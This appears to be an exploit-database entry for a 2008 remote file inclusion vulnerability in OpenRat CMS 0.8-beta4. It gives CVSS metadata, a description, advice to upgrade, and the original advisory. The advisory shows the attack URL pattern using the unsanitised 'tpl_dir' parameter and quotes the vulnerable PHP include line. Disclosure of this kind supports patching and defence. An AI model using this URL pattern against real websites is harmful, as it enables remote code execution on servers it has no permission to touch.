header-logo
Suggest Exploit
vendor:
OpenRat
by:
dun
8.8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: OpenRat
Affected Version From: 0.8-beta4
Affected Version To: 0.8-beta4
Patch Exists: YES
Related CWE: N/A
CPE: a:openrat:openrat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

OpenRat <= 0.8-beta4 Remote File Inclusion Vulnerability

OpenRat is a free Web Content-Management-System. A vulnerability exists in OpenRat <= 0.8-beta4 which allows a remote attacker to include arbitrary files from local or external resources. This is due to the 'tpl_dir' parameter in 'themes/default/include/html/insert.inc.php' script not properly sanitized before being used to include files.

Mitigation:

Upgrade to the latest version of OpenRat.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #####################################################################
 #  [ OpenRat <= 0.8-beta4 ]   Remote File Inclusion Vulnerability   #
 #####################################################################
 #
 # Script: "OpenRat is a free Web Content-Management-System."
 #
 # Script site: http://www.openrat.de/
 # Download: http://www.openrat.de/download/  
 #           http://dl.openrat.de/openrat-cvs-2007-12-05.tar.gz
 #
 # Vuln: http://site.com/openrat/themes/default/include/html/insert.inc.php?tpl_dir=[spread???]
 #      
 #
 # Bug: ./openrat/themes/default/include/html/insert.inc.php
 #
 # ...
 # 	<?php include( $tpl_dir.$attr_file.'.tpl.php') ?>
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-23]